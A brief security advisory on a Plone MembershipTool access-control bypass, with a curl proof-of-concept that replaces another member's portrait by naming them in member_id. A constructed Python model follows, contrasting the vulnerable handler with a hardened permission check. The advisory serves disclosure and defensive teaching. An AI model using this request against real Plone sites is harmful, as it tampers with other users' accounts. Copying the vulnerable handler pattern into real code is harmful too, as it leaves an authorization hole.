Plone MembershipTool Access Control Bypass Vulnerability

Attackers may use standard web client applications to exploit this issue.

The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:

curl -F portrait=@<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
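The request above works because the handler takes the target account from the caller-supplied member_id field instead of from the authenticated session. The following Python model, added here and not taken from the advisory or from Plone's own MembershipTool code, shows that vulnerable pattern next to a hardened form in which member_id is honoured only for callers holding a management permission; the Member, Request, PortraitStore names and the "Manage portal" permission string are hypothetical stand-ins for the real API.

```python
"""Constructed model of a 'change member portrait' handler (hypothetical, not Plone's API).

Shows the access-control flaw (trusting the caller's member_id) beside a
hardened version that binds the target to the authenticated user unless the
caller holds a management permission.
"""
from dataclasses import dataclass, field

MANAGE_PORTAL = "Manage portal"  # hypothetical permission name


@dataclass
class Member:
    user_id: str
    permissions: set = field(default_factory=set)
    portrait: bytes = b""


@dataclass
class Request:
    authenticated_user: Member   # who is logged in (from the session, not the form)
    form: dict                   # the submitted multipart fields


class PortraitStore:
    def __init__(self, members):
        self.members = {m.user_id: m for m in members}

    def change_portrait_vulnerable(self, request):
        """Vulnerable pattern: any logged-in user chooses the target via member_id."""
        target = request.form.get("member_id") or request.authenticated_user.user_id
        self.members[target].portrait = request.form["portrait"]
        return target

    def change_portrait_hardened(self, request):
        """Hardened pattern: member_id is ignored unless the caller is a manager."""
        caller = request.authenticated_user
        requested = request.form.get("member_id")
        if requested and requested != caller.user_id:
            if MANAGE_PORTAL not in caller.permissions:
                raise PermissionError("only managers may change another member's portrait")
            target = requested
        else:
            target = caller.user_id
        if target not in self.members:
            raise KeyError(f"unknown member {target!r}")
        self.members[target].portrait = request.form["portrait"]
        return target


def demo():
    """Run both handlers on a constructed scenario and report which account was modified."""
    alice = Member("alice")
    bob = Member("bob")
    admin = Member("admin", {MANAGE_PORTAL})
    store = PortraitStore([alice, bob, admin])

    # Constructed request: alice is logged in but names bob in member_id.
    crafted = Request(alice, {"member_id": "bob", "portrait": b"<constructed image bytes>"})

    vulnerable_target = store.change_portrait_vulnerable(crafted)   # bob's portrait overwritten
    try:
        store.change_portrait_hardened(crafted)
        hardened_result = "allowed"
    except PermissionError:
        hardened_result = "denied"

    # A manager may still legitimately set another member's portrait.
    admin_req = Request(admin, {"member_id": "bob", "portrait": b"<constructed image bytes>"})
    admin_target = store.change_portrait_hardened(admin_req)

    return {
        "vulnerable_target": vulnerable_target,
        "hardened_result": hardened_result,
        "admin_target": admin_target,
    }


if __name__ == "__main__":
    print(demo())
```

The fix is the single comparison between the form field and the session identity: the hardened handler derives the target from the authenticated user and treats a differing member_id as a privileged operation, which is the check the vulnerable code path lacks.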

Copyright 2010, SecurityFocus